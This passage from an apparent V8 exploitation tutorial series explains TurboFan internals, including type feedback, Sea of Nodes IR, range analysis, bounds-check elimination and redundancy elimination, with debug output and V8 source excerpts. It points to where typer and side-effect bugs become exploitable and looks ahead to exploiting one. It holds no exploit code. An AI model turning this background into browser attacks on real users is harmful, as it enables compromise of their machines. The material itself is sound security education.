Well, the function is still “hot” and there are a few more thousand iterations to go. What TurboFan will do, now that it has collected both a number and a string within the type feedback, is go back and optimize the code for a second time. But this time it will add code which will allow for string evaluation. In this case, a second type guard will be added - so the second run of code is now optimized for both a number and a string!

A good example and explanation of this can be seen in the video “Inside V8: The choreography of Ignition and TurboFan”.

We can also see this updated feedback in the BinaryOp slot by running the %DebugPrint command against our add function. You should see something similar to the output below.

d8> %DebugPrint(add)
DebugPrint: 000003E20025970D: [Function] in OldSpace
 - map: 0x03e200243fa1 <Map[32](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x03e200243ec9 <JSFunction (sfi = 000003E20020AA45)>
 - elements: 0x03e200002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype:
 - initial_map:
 - shared_info: 0x03e20025962d <SharedFunctionInfo add>
 - name: 0x03e200005809 <String[3]: #add>
 - builtin: InterpreterEntryTrampoline
 - formal_parameter_count: 1
 - kind: NormalFunction
 - context: 0x03e200243881 <NativeContext[273]>
 - code: 0x03e20020b31d <CodeDataContainer BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x03e20025aca5 <BytecodeArray[9]>
 - source code: (i) {return 1 + i;}
 - properties: 0x03e200002259 <FixedArray[0]>
   ...
 - feedback vector: 000003E20025ACF1: [FeedbackVector] in OldSpace
 - map: 0x03e20000273d <Map(FEEDBACK_VECTOR_TYPE)>
 - length: 1
 - shared function info: 0x03e20025962d <SharedFunctionInfo add>
 - no optimized code
 - tiering state: TieringState::kNone
 - maybe has maglev code: 0
 - maybe has turbofan code: 0
 - invocation count: 5623
 - profiler ticks: 0
 - closure feedback cell array: 000003E200003511: [ClosureFeedbackCellArray] in ReadOnlySpace
 - map: 0x03e200002981 <Map(CLOSURE_FEEDBACK_CELL_ARRAY_TYPE)>
 - length: 0

 - slot #0 BinaryOp BinaryOp:Any {
     [0]: 127
  }

As you can see, the BinaryOp now stores the feedback type of Any, instead of SignedSmall and String. Why? Well, this is due to something called the Feedback Lattice.

Feedback Lattice

The feedback lattice stores the possible feedback states for an operation. It starts with None, which indicates that it hasn’t seen anything, and it goes down toward the Any state, which indicates that it’s seen a combination of inputs and outputs. The Any state indicates that the function is to be considered polymorphic, while in contrast, any other state indicates that the function is monomorphic - since it’s only produced a certain value.

If you would like to learn more about the difference between monomorphic and polymorphic code, I highly suggest you read the fantastic article “What’s up with Monomorphism?”.

Below, I have provided you a visual example of what the feedback lattice roughly looks like.

This lattice works the same way as the array lattice from Part 1. Feedback can only progress downwards in the lattice. Once we go from Number to Any, we can never go back. If we do go back for some magic reason, then we risk entering a so-called deoptimization loop where the optimizing compiler consumes invalid feedback and bails out from optimized code continuously.
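One way to picture why feedback can only move in one direction is to model each state as a set of bits and combine states with a bitwise OR. The sketch below does that. Please note that the bit values are an assumption on my part, modeled on V8’s BinaryOperationFeedback enum: only SignedSmall being 1 and Any being 127 are backed by the %DebugPrint output we saw earlier.

```javascript
// Bit values are an assumption modeled on V8's BinaryOperationFeedback enum;
// only SignedSmall = 1 and Any = 127 are confirmed by the %DebugPrint output.
const Feedback = {
  None: 0x00,
  SignedSmall: 0x01,
  Number: 0x07,
  String: 0x10,
  Any: 0x7f,
};

// Combining feedback is a bitwise OR, so bits are only ever added.
function combine(previous, observed) {
  return previous | observed;
}

let slot = Feedback.None;
slot = combine(slot, Feedback.SignedSmall); // 1
slot = combine(slot, Feedback.Number);      // 7 (Number includes SignedSmall)
slot = combine(slot, Feedback.Any);         // 127
slot = combine(slot, Feedback.SignedSmall); // still 127, no way back up
console.log(slot);
```

Because an OR can never clear a bit, a slot that has reached Any stays at Any no matter what it observes afterwards.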

You can see more information on the type checks within the v8/src/compiler/use-info.h file. Also, if you want to learn more about V8’s feedback system and inline cache, I suggest watching “V8 and How It Listens to You - Michael Stanton”.

“Sea of Nodes” Intermediate Representation (IR)

Now that we know how type feedback is collected for TurboFan to make its speculative assumptions, let’s see how TurboFan builds its specialized IR from this feedback. The reason that IR is generated is that this data structure abstracts from code complexity, which in turn makes it easier to perform compiler optimizations.

Now, TurboFan’s “Sea of Nodes” IR is based on static single assignment or SSA, which is a property of IR that requires each variable to be assigned exactly once and defined before it is used. This is useful for optimizations such as redundancy elimination.

An example of SSA for our add function from our previous example can be seen below.

// function add(i) {return 1 + i;}
var i1 = argument
var r1 = 1 + i1
return r1

This SSA form is then converted to a graph format, which is similar to a control-flow graph (CFG) where it uses nodes and edges to represent code and its dependencies between computations. This type of graph form allows TurboFan to utilize it for both data-flow analysis and machine code generation.

So, let’s see what this Sea of Nodes looks like. We’ll use our hot_function example for this. Start by creating a new JavaScript file and add the following to it.

function hot_function(obj) {
	return obj.x;
}

for (let i=0; i < 10000; i++) {
	hot_function({x:i});
}

Once done, we will run this script via d8 with the --trace-turbo flag, which allows us to trace and save the IR generated by TurboFan’s JIT. Your output should look similar to mine. At the end of the run, it should generate a JSON file that has the naming convention of turbo-*.json.

C:\dev\v8\v8\out\x64.debug>d8 --trace-turbo hot_function.js
Concurrent recompilation has been disabled for tracing.
---------------------------------------------------
Begin compiling method add using TurboFan
---------------------------------------------------
Finished compiling method add using TurboFan

After that’s completed, navigate to Turbolizer in a web browser, press CTRL + L, and load your JSON file. This tool will help us visualize the sea of nodes graph generated by TurboFan.

The graph you see should be pretty much identical to mine.

In Turbolizer, on the left you’ll see your source code, and on the right side (not shown in image) you’ll have the optimized machine code that was generated by TurboFan. In the middle you will have the sea of nodes graph.

Currently a lot of the nodes are hidden and only the control nodes are shown, which is the default behavior. If you click on the “Show All Nodes” box to the right of the “refresh” symbol, you’ll see all the nodes.

By messing around in Turbolizer and viewing the graph, you’ll notice that there are five different colors of nodes, and they represent the following:

  • Yellow: These nodes represent control nodes, meaning anything that can change the “flow” of the script - such as an if/else statement.
  • Light Blue: These nodes represent a value a certain node can have or return, such as heap constants or inlined values.
  • Red: Represents semantics of JavaScript’s overloaded operators, such as any action that is executed at the JavaScript level, i.e., JSCall, JSAdd, etc. These resemble bytecode operations.
  • Blue: Express VM-level operations, such as allocations, bound checks, loading data off stack, etc. This is helpful in tracking feedback being consumed by TurboFan.
  • Green: These correspond to single machine level instructions.

As we can see, each node within this Sea of Nodes can represent arithmetic operations, loads, stores, calls, constants, etc. Then there are three edges (represented by the arrows between each node) that we need to know about which express dependencies. These edges are:

  • Control: Just like in a CFG, these edges enable branches and loops.
  • Value: Just like in Data Flow Graphs, these show value dependencies and output.
  • Effect: Detail order operations such as reading or writing states.
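To get a feel for how nodes and the three edge kinds fit together, here is a toy graph for our add function built in plain JavaScript. The node helper, its field names, and the way the edges are wired are all illustrative assumptions; this is not V8’s Node class and not the exact graph TurboFan would build.

```javascript
// Toy node structure; field names are illustrative, not V8's Node class.
let nextId = 0;
function node(op, { value = [], effect = [], control = [] } = {}, param) {
  return { id: nextId++, op, value, effect, control, param };
}

// Graph for: function add(i) { return 1 + i; }
const start = node("Start");
const i1 = node("Parameter", { control: [start] }, 0);
const one = node("NumberConstant", {}, 1);
const sum = node("SpeculativeSafeIntegerAdd", {
  value: [one, i1], effect: [start], control: [start],
});
const ret = node("Return", { value: [sum], effect: [sum], control: [start] });

// Evaluate the graph by following value edges only.
function evaluate(n, args) {
  switch (n.op) {
    case "Parameter": return args[n.param];
    case "NumberConstant": return n.param;
    case "SpeculativeSafeIntegerAdd":
      return evaluate(n.value[0], args) + evaluate(n.value[1], args);
    case "Return": return evaluate(n.value[0], args);
    default: throw new Error(`no value for ${n.op}`);
  }
}

console.log(evaluate(ret, [41]));
```

Notice that computing the result only needs the value edges, while the effect and control edges exist purely to constrain ordering. That separation is what gives the compiler freedom to move nodes around.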

With that knowledge, let’s expand the graph a little bit and look at a few of the other nodes to understand how the flow works. Take note that I have hidden a few select nodes that aren’t really important.

As we can see, the Yellow colored nodes are control nodes which manage the flow of the function. Initially we have the Loop node, which tells us that we are going into a loop. From there the control edges point to the Branch and LoopExit nodes. The Branch is exactly what it sounds like: it “branches” the loop into a True/False statement.

If we follow the Branch node up, we will see that it has a SpeculativeNumberLessThan node which has a value edge pointing to a NumberConstant with the value of 10000. This falls in line with our function, since we were looping 10k times. Since this node is Green, it is a machine instruction, and signifies our type guard for the loop.

You can see from the SpeculativeNumberLessThan node that there is an effect edge pointing to LoopExitEffect, which means that if the number is more than 10k, we exit the loop, because we just broke the assumption.

While the value is under 10k and the SpeculativeNumberLessThan is true, we will load our object and call JSDefineNamedOwnProperty, which will get the object’s offset to property x. Then we call JSCall to add 1 to our property value and return the value. From that node we also have an effect edge going to SpeculativeSafeIntegerAdd. This node has a value edge pointing to a NumberConstant node that has the value of 1, which is the mathematical addition we are doing when we return the value.

Again note that we have a SpeculativeSafeIntegerAdd node that checks to make sure that the addition arithmetic we are doing is indeed adding an SMI and not something else, otherwise it would trigger the type guard and deoptimize.

For those that might be wondering what the Phi node is, that’s basically an SSA node that merges the two (or more) possibilities for a value that have been computed by different branches. In this case it’s merging both of the potential integer speculations together.
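If Phi nodes are new to you, the small sketch below shows the idea on a two-way branch. The phi helper and ssaExample function are hypothetical, and a real Phi is selected by control flow rather than by a function call, so read this purely as a mental model.

```javascript
// Source:              SSA form:
//   let a = 1;           a1 = 1
//   if (c) a = 2;        a2 = 2
//   return a;            a3 = phi(a2, a1); return a3

// Picks the value that belongs to the branch that was actually taken.
function phi(tookBranch, ifTaken, ifNotTaken) {
  return tookBranch ? ifTaken : ifNotTaken;
}

function ssaExample(c) {
  const a1 = 1;             // every name is assigned exactly once
  const a2 = 2;
  const a3 = phi(c, a2, a1); // merge point after the if
  return a3;
}

console.log(ssaExample(true), ssaExample(false));
```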

As you can see, understanding these graphs isn’t too complex once you understand the basics.

Now, if you look at the top left portion of the sea of nodes window, you’ll see that we are in the V8.TFBytecodeGraphBuilder option. This option shows us the generated IR from bytecode without any optimizations applied to it. From the drop-down menu we can select the other different optimization passes that this code goes through to view the associated IR.

Common Optimizations

Alright, now that we covered TurboFan’s Sea of Nodes, we should have at least a decent understanding of how to navigate and understand the generated IR. From here we can dive into understanding some of TurboFan’s common optimizations. These optimizations in essence act on the original graph that was produced from bytecode.

Since the resulting graph now has static type information due to type guards, the optimizations are done in a more classic ahead-of-time fashion to improve the execution speed or memory footprint of the code. Afterwards, once the graph is optimized, the resulting graph is lowered to machine code (known as “lowering”) and is then written into an executable memory region for V8 to execute when the compiled function is called.

One thing to note is that lowering can happen in multiple stages with further optimizations in between, making this compiler pipeline pretty flexible.

With that being said, let’s look into a few of these common optimizations.

Typer

One of the earliest optimization phases is called the TyperPhase, which is run by the OptimizeGraph function. This phase traces through the code and identifies the resulting types of operations from heap objects, such as Int32 + Int32 = Int32.

When Typer runs, it will visit every node of the graph and will try to “reduce” them down by trying to simplify operation logic. It will then call the node’s associated typer call to associate a Type with it.

For example, in our case the constant integers within the loop and return arithmetic will be visited by Typer::Visitor::TypeNumberConstant, which will return a type of Range - as can be seen by the code example from v8/src/compiler/types.cc.

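Type Type::Constant(double value, Zone* zone) {
  if (RangeType::IsInteger(value)) {
    // Integer constants become a single-value range [value, value].
    return Range(value, value, zone);
  } else if (IsMinusZero(value)) {
    return Type::MinusZero();
  } else if (std::isnan(value)) {
    return Type::NaN();
  }
  // ... (remaining cases omitted in this excerpt)
}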

Now what about our speculation nodes?

Those are handled by the OperationTyper. In our case, the arithmetic speculation for returning our value will call OperationTyper::SpeculativeSafeIntegerAdd, which will set the type to a “safe integer” range, such as Int64. This type will be checked, and if it’s not an Int64 during execution, we deoptimize. This in essence allows arithmetic operations to have positive and negative return values, and it prevents potential over/underflow issues.

Knowing this, let’s take a look at the V8.TFTyper optimization phase to see the graph and the nodes’ associated types.

Range Analysis

During the Typer optimization the compiler traces through the code, identifies the range of operations and calculates the bounds of the resulting values. This is known as range analysis.

If you noticed in the graph above, we encountered the Range type, especially for the SpeculativeSafeIntegerAdd node which had the range of an Int64 variable. The reason this was done is because the range analysis optimizer computes the min and max of values that are added or returned.

In our case, we were returning the value of i from our object’s property of x plus 1. The type feedback only really knew that the value returned is an integer and nothing more; it could never really tell what range the value would be in. So, to err on the safe side, it decided to give it the largest value possible in order to prevent issues.

So, let’s take another look at this range analysis by considering the following code:

function hot_function(obj) {
	let a = 13;
	if (obj == "leet")
		a = 1337;
	return a + 1;
}

As we can see, the value of a depends on the obj parameter that is passed in: if obj is a string that equals the word leet, then a will equal 1337; otherwise it will equal 13. This part of the code will go through SSA and be merged into a Phi node that will contain the range of what a can be. The constants will have their range set to their hardcoded value, but these constants will also have an effect on our speculative ranges due to arithmetic computations.

If we were to look at the graph produced from this code after range analysis, we should see the following.

As you can see, due to SSA we have the Phi node. During range analysis the typer visits the TypePhi node function and creates a union of the operands 13 and 1337, allowing us to have the possible range for a.

For the speculative nodes, the OperationTyper calls the AddRanger function, which computes the min and max bounds for the Range type. In this case you can see that the typer computes the range of our return values for both possible values of a after our arithmetic operations.
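To make these two typing steps more concrete, here is a minimal sketch in plain JavaScript. It is a toy model and not V8's implementation: the range, unionRanges, and addRanges helpers are hypothetical names that only imitate what the Phi typing and the AddRanger function are described as doing above, and the constant 1 that gets added is picked purely for illustration.

```javascript
// Toy model of range analysis. All helper names are hypothetical and
// only imitate the behavior described in the text; this is not V8 code.

// A range is a closed interval [min, max].
function range(min, max) {
  return { min, max };
}

// Phi typing: the merged value can come from either branch, so its
// range has to cover both inputs.
function unionRanges(a, b) {
  return range(Math.min(a.min, b.min), Math.max(a.max, b.max));
}

// Addition: the smallest result is min + min, the largest is max + max.
function addRanges(a, b) {
  return range(a.min + b.min, a.max + b.max);
}

// Constants are typed as a range that holds a single value.
const thirteen = range(13, 13);
const leet = range(1337, 1337);

// After the branch, the merged value is either 13 or 1337.
const phi = unionRanges(thirteen, leet);

// Adding a constant (1 here, an arbitrary choice) shifts both bounds.
const sum = addRanges(phi, range(1, 1));

console.log(phi.min, phi.max); // 13 1337
console.log(sum.min, sum.max); // 14 1338
```

If a value outside of the computed range ever shows up at runtime, the assumptions baked into the optimized code no longer hold, which is why the compiler has to deoptimize in that case.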

With this, in the case that the range analysis fails and we get a value not expected by the compiler, we deoptimize. Pretty simple to understand!

Bounds Checking Elimination (BCE)

Another common optimization that was applied with the Typer during the simplified lowering phase was the elimination of redundant CheckBounds nodes. This optimization is usually applied to array access operations if, after range analysis, the index has been proven to be within the bounds of the array.

The reason I say “was” is that the Chromium team has decided to disable this optimization in order to harden TurboFan’s bounds checks against typer bugs. There are some “bugs” that will allow you to get around the hardening, but I won’t get into that. If you want to learn more about those bugs then I suggest reading “Circumventing Chrome’s Hardening of Typer Bugs”.

Either way, let’s demonstrate how this type of optimization would have worked by taking the following code for example:

function hot_function(obj) {
	let values = [0,13,1337]
	let a = 1;
	if (obj == "leet")
		a = 2;
	return values[a];
}

As you can see, this is pretty much similar to the code we used in our range analysis. We again accept a parameter to our hot_function, and if the object matches a string of “leet” we set a to 2 and return the value of 1337; otherwise a stays at 1 and we return the value of 13.

Take particular note that a never equals 0, so we’ll never, or at least should never, be able to return 0. This creates an interesting case for us when we look at the graph. So, let’s look at the escape analysis portion of the IR and see what our graph looks like.

As you can see, we have another Phi node that merges our potential values of a and then we have our CheckBounds node which is used to check the bounds of the array. If we are in range of 1 or 2, we call LoadElement to load our element from the array, otherwise we will bailout since the bounds check is not expecting an index of 0.

For those that have noticed it already, you might be wondering why our LoadElement is of type Signed31 and not Signed32. Simply put, Signed31 means that the value fits in a 31-bit signed integer. As covered in Part 1, V8 stores small integers (Smis) as tagged values, so with pointer compression one of the 32 bits is reserved for the tag, which leaves 31 bits (sign included) for the value itself. Also, as we can see, the LoadElement has an input of a FixedArray HeapConstant with a length of 3. This array would be our values array.

Once escape analysis has been conducted, we move onto the simplified lowering phase. This lowering phase simply (pun intended) changes all value representations to the correct machine representation, as dictated by the machine operators themselves. The code for this phase is located within v8/src/compiler/simplified-lowering.cc. It is within this phase that bounds checking elimination is conducted.

So how does the compiler decide to make a CheckBounds node redundant?

Well, for each CheckBounds node the VisitCheckBounds function is going to be called. This function is responsible for checking that the index’s minimum is equal to or greater than zero and that its maximum is strictly less than the array length. If the check is true, then it triggers a DeferReplacement which marks the node for removal.

An example of the VisitCheckBounds function before the hardening commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5 can be seen below.

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            DeferReplacement(node, node->InputAt(0)); // <= Removes Nodes
          } else {
            NodeProperties::ChangeOp(
                node, simplified()->CheckedUint32Bounds(p.feedback()));
          }
        }
      ...
  }

As you can see our CheckBound range would fall into the if statement, where Range(1,2).Min() >= 0 and Range(1,2).Max() < 3. In that case our node #46 from the above graph would be made redundant and removed.
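The condition from the snippet above can be restated as a small standalone function. This is only a sketch in plain JavaScript: isBoundsCheckRedundant is a hypothetical helper, and ranges are modeled as simple objects with min and max fields rather than V8 types.

```javascript
// Toy version of the redundancy test applied to a CheckBounds node.
// `isBoundsCheckRedundant` is a hypothetical helper, not a V8 function.
function isBoundsCheckRedundant(indexRange, lengthRange) {
  // The index can never be negative...
  const nonNegative = indexRange.min >= 0;
  // ...and even its largest value is below the smallest possible length.
  const belowLength = indexRange.max < lengthRange.min;
  return nonNegative && belowLength;
}

// The values array always has exactly 3 elements.
const arrayLength = { min: 3, max: 3 };

console.log(isBoundsCheckRedundant({ min: 1, max: 2 }, arrayLength));  // true
console.log(isBoundsCheckRedundant({ min: 1, max: 3 }, arrayLength));  // false
console.log(isBoundsCheckRedundant({ min: -1, max: 2 }, arrayLength)); // false
```

Note that the decision relies entirely on the ranges computed by the typer. If the typer gets a range wrong, a check that is actually needed would be treated as redundant.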

Now, if you look at the updated code after the commit, you will see a slight change. The call to DeferReplacement has been removed, and instead the node is always replaced with a CheckedUint32Bounds node. When the typer believes the check is redundant, TurboFan additionally sets the kAbortOnOutOfBounds flag, so if the check still fails at runtime, execution aborts and crashes instead of deoptimizing.

The new code can be seen below:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckBoundsParameters const& p = CheckBoundsParametersOf(node->op());
    FeedbackSource const& feedback = p.check_parameters().feedback();
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));

    // Conversions, if requested and needed, will be handled by the
    // representation changer, not by the lower-level Checked*Bounds operators.
    CheckBoundsFlags new_flags =
        p.flags().without(CheckBoundsFlag::kConvertStringAndMinusZero);

    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32()) ||
          (index_type.Is(Type::Integral32OrMinusZero()) &&
           p.flags() & CheckBoundsFlag::kConvertStringAndMinusZero)) {
        // Map the values in the [-2^31,-1] range to the [2^31,2^32-1] range,
        // which will be considered out-of-bounds because the {length_type} is
        // limited to Unsigned31. This also converts -0 to 0.
        VisitBinop<T>(node, UseInfo::TruncatingWord32(),
                      MachineRepresentation::kWord32);
        if (lower<T>()) {
          if (index_type.IsNone() || length_type.IsNone() ||
              (index_type.Min() >= 0.0 &&
               index_type.Max() < length_type.Min())) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            // TODO(neis): Move this into TypedOptimization?
            new_flags |= CheckBoundsFlag::kAbortOnOutOfBounds; // <= Abort & Crash
          }
          ChangeOp(node,
                   simplified()->CheckedUint32Bounds(feedback, new_flags)); // <= Replace Node
        }
      ...
  }

If we look at the simplified lowering portion of the graph, we can indeed see that the CheckBounds node has now been replaced with a CheckedUint32Bounds node as per the code and all other nodes had their values “lowered” to machine code representation.

Redundancy Elimination

Another popular class of optimizations that is similar to the BCE, is called redundancy elimination. The code for this is located within v8/src/compiler/redundancy-elimination.cc and is responsible for removing redundant type checks. The RedundancyElimination class is essentially a graph reducer that tries to either remove or combine redundant checks in the effect chain.

The effect chain is pretty much the order of operations between effect edges for load and store functions. For example, if we try to load a property from an object and add to it, such as obj[x] = obj[x] + 1, then our effect chain would be JSLoadNamed => SpeculativeSafeIntegerAdd => JSStoreNamed. TurboFan has to make sure that these nodes’ external effects aren’t reordered, or otherwise we might have improper guards in place.

A reducer, as detailed in v8/src/compiler/graph-reducer.h, tries to simplify a given node based on its operator and inputs. There are a few types of reducers, such as constant folding, where if we add two constants together we’ll fold them into just one (i.e. 3 + 5 becomes a single constant node of 8), and strength reduction, where an operation that has no effect on its input is dropped so that only the input remains (i.e. x + 0 becomes just the node x).
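As a rough illustration of those two reductions, here is a toy reducer written in plain JavaScript. The node shapes and the reduce function are made up for this example, and it assumes purely numeric inputs. V8's real reducers work on graph nodes and are far more involved.

```javascript
// Toy reducer over a tiny expression tree. Node shapes and the `reduce`
// function are hypothetical; numeric inputs are assumed throughout.
function constant(value) { return { op: "Constant", value }; }
function param(name) { return { op: "Parameter", name }; }
function add(left, right) { return { op: "Add", left, right }; }

function reduce(node) {
  if (node.op !== "Add") return node; // nothing to simplify
  const left = reduce(node.left);
  const right = reduce(node.right);
  // Constant folding: both inputs are known, so compute the result now.
  if (left.op === "Constant" && right.op === "Constant") {
    return constant(left.value + right.value);
  }
  // Strength reduction: adding zero leaves the other input unchanged.
  if (right.op === "Constant" && right.value === 0) return left;
  if (left.op === "Constant" && left.value === 0) return right;
  return add(left, right);
}

const folded = reduce(add(constant(3), constant(5)));
const simplified = reduce(add(param("x"), constant(0)));

console.log(folded.op, folded.value);        // Constant 8
console.log(simplified.op, simplified.name); // Parameter x
```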

We can trace these types of reductions with the --trace_turbo_reduction flag. If we were to run our hot_function again from above with that flag, you should see output as such.

C:\dev\v8\v8\out\x64.debug>d8 --trace_turbo_reduction hot_function.js
- Replacement of #12: Parameter[-1, debug name: %closure](0) with #41: HeapConstant[0x00c800259781 <JSFunction hot_function (sfi = 000000C800259679)>] by reducer JSContextSpecialization
- Replacement of #34: JSLoadProperty[sloppy, FeedbackSource(#2)](14, 30, 5, 4, 35, 31, 26) with #47: LoadElement[tagged base, 8, Signed31, kRepTaggedSigned|kTypeInt32, FullWriteBarrier](44, 46, 46, 26) by reducer JSNativeContextSpecialization
- Replacement of #42: Checkpoint(33, 31, 26) with #31: Checkpoint(33, 21, 26) by reducer CheckpointElimination
- In-place update of #36: NumberConstant[0] by reducer Typer
... snip ...
- In-place update of #26: Merge(24, 27) by reducer BranchElimination
- In-place update of #43: CheckMaps[None, 0x00c80024dcb9 <Map[16](PACKED_SMI_ELEMENTS)>, FeedbackSource(INVALID)](61, 62, 26) by reducer RedundancyElimination
- Replacement of #43: CheckMaps[None, 0x00c80024dcb9 <Map[16](PACKED_SMI_ELEMENTS)>, FeedbackSource(INVALID)](61, 62, 26) with #62: CheckInternalizedString(2, 18, 8) by reducer LoadElimination
- In-place update of #44: LoadField[JSObjectElements, tagged base, 8, Internal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier, mutable](61, 62, 26) by reducer RedundancyElimination
- Replacement of #44: LoadField[JSObjectElements, tagged base, 8, Internal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier, mutable](61, 62, 26) with #50: HeapConstant[0x00c800259811 <FixedArray[3]>] by reducer LoadElimination
- In-place update of #45: LoadField[JSArrayLength, tagged base, 12, Range(0, 134217725), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](61, 62, 26) by reducer RedundancyElimination
- Replacement of #45: LoadField[JSArrayLength, tagged base, 12, Range(0, 134217725), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](61, 62, 26) with #59: NumberConstant[3] by reducer LoadElimination
... snip ...

There’s a lot of interesting output from that flag, and as you can see there are a lot of different reducers and eliminations that are executed. We’ll briefly cover a few of them later in this post, but I want you to look carefully at a few of these reductions.

For example, this one:

In-place update of #43: CheckMaps[None, 0x00c80024dcb9 <Map[16](PACKED_SMI_ELEMENTS)>, FeedbackSource(INVALID)](61, 62, 26) by reducer RedundancyElimination

Yah, you read that correctly - CheckMaps was updated and later replaced due to the RedundancyElimination reducer. The reason this happened is because redundancy elimination detected that the CheckMaps call was a redundant check and removed all but the first one in the same control-flow path.

At this point I know what a few of you might be thinking: “Isn’t that a security vulnerability?” The answer to that is “potentially” and “it depends”.

Before I explain this in a bit more detail, let’s take a look at the following code example:

function hot_function(obj) {
	return obj.a + obj.b;
}

As you can see, this code is pretty simple. It takes in one object and returns the sum of the values from property a and property b. If we look into the Typer optimization graph, we will see the following.

As you can see, when we enter our function, we first call CheckMaps to validate that the map of the object we are passing in corresponds to having both the a and b properties. If that check passes, we then call LoadField to load in offset 12 from the Parameter constant, which is the a property from the obj object that we passed in.

Right after that, we do another CheckMaps call to validate the map again, and then load property b. Once that’s done, we call the JSAdd function to either add numbers, strings, or both together.

The issue here is the redundant CheckMaps call because, as we know, the map of the object that we are passing in can’t change between the two CheckMaps operations. In that case, it will be removed.

We can see this redundancy elimination within the simplified lowering phase of the graph.

As you can clearly see, the second CheckMaps node has now been removed and after the first check we simply load both of the properties one after another - in essence speeding up our code. Also, due to simplified lowering the JSAdd call has been lowered down to the machine code variant to validate both integer and string expressions as per the ECMAScript standard.
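The idea behind this pass can be sketched with a toy model in plain JavaScript. The node format, the hasSideEffects field, and the eliminateRedundantChecks function are all hypothetical and exist only for this illustration. The real RedundancyElimination reducer works on TurboFan's graph and effect edges.

```javascript
// Toy redundancy elimination over a linear effect chain. The node format
// and `eliminateRedundantChecks` are hypothetical, for illustration only.
function eliminateRedundantChecks(effectChain) {
  const checked = new Set(); // objects whose map is currently known
  const result = [];
  for (const node of effectChain) {
    if (node.op === "CheckMaps") {
      if (checked.has(node.object)) continue; // already proven, drop it
      checked.add(node.object);
    } else if (node.hasSideEffects) {
      // Anything could have changed, so forget what was proven so far.
      checked.clear();
    }
    result.push(node);
  }
  return result;
}

const effectChain = [
  { op: "CheckMaps", object: "obj" },
  { op: "LoadField", object: "obj", field: "a", hasSideEffects: false },
  { op: "CheckMaps", object: "obj" },
  { op: "LoadField", object: "obj", field: "b", hasSideEffects: false },
];

const optimized = eliminateRedundantChecks(effectChain);
console.log(optimized.map((node) => node.op).join(" => "));
// CheckMaps => LoadField => LoadField
```

In this model, the second check is only dropped because nothing with side effects sits between the two checks. A node marked with hasSideEffects: true in between would force the second CheckMaps to stay.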

So, going back to our question of whether this is a security vulnerability or not. As stated, “it depends”. The reason for this is that certain operations can cause side-effects to the observable execution of our context - that’s why we have side-effect chains. If TurboFan for some reason forgets to take a side-effect into account and doesn’t write it to the side-effect chain, then it’s possible that the Map of the object can change during execution, such as through another user function call modifying the object or adding a property.

Each intermediate representation operation in V8 has various flags associated with it. An example of a few of the flags for JavaScript operators can be seen in v8/src/compiler/js-operator.cc. Some of these flags have specific assumptions around them.

For example, V(ToString, Operator::kNoProperties, 1, 1) marks ToString with kNoProperties, which means that no special properties are set for the operator, so the compiler can’t make any assumptions about it and has to treat it as potentially having side-effects. Another one, such as V(LoadMessage, Operator::kNoThrow | Operator::kNoWrite, 0, 1), assumes via the kNoWrite flag that the LoadMessage operation will not have observable side-effects. An operation with the kNoWrite flag is not treated as a write on the effect chain.

As you can see, if we can get the compiler to remove a redundancy check for an operation that seemingly thinks there are no side-effects, then you have a potentially exploitable bug if you can modify an object or property during the execution of the compiled code.
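To see why a missed side-effect matters, consider this plain JavaScript sketch. The function names are made up for illustration and nothing here triggers a bug. It only shows that code running between two property accesses can change an object's shape, which is exactly what the second map check guards against.

```javascript
// `sumWithCallback`, `noop`, and `reshape` are hypothetical names.
function sumWithCallback(obj, callback) {
  const a = obj.a;  // optimized code would check obj's map here
  callback(obj);    // arbitrary user code: may change obj's shape
  return a + obj.b; // so the map has to be checked again here
}

// A callback that leaves the object alone.
function noop(obj) {}

// A callback that deletes one property and adds another.
function reshape(obj) {
  delete obj.b;
  obj.c = 3;
}

console.log(sumWithCallback({ a: 1, b: 2 }, noop));    // 3
console.log(sumWithCallback({ a: 1, b: 2 }, reshape)); // NaN
```

The engine handles the second call correctly because the callback is known to have side-effects. The dangerous situation is the one described above, where an operation changes an object but is annotated as if it could not.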

This topic of redundancy elimination and side-effects can be expanded on to discuss how bugs stemming from these elimination checks can lead to exploitable vulnerabilities. But before we do that, let’s just quickly go over some other common optimizations.

Other Optimizations

As previously seen from the output of the --trace_turbo_reduction flag, there are a lot more optimizations that occur in TurboFan than what we talked about. I tried to cover the most important ones that are related to the bug we will be exploiting in Part 3, but I still want to quickly cover some of the other optimizations so at least you have a general gist of what they are.

Some of the other common optimizations you will see in TurboFan are as follows:

  • Control Optimization: As defined in v8/src/compiler/control-flow-optimizer.cc, generally this optimization works on optimizing the flow of the graph and turns certain branch chains into switches.
  • Alias Analysis & Global Value Numbering: Alias analysis identifies dependencies between Store and Load nodes. So, if two load operations depend on an earlier store, they can’t be executed until that first operation is complete, i.e. x = 2; y = x + 2; z = x + 2. GVN, or Global Value Numbering, follows suit and removes redundant Store and Load operations, i.e. z = x + 2 can be removed and z can be set to y since the operation is redundant.
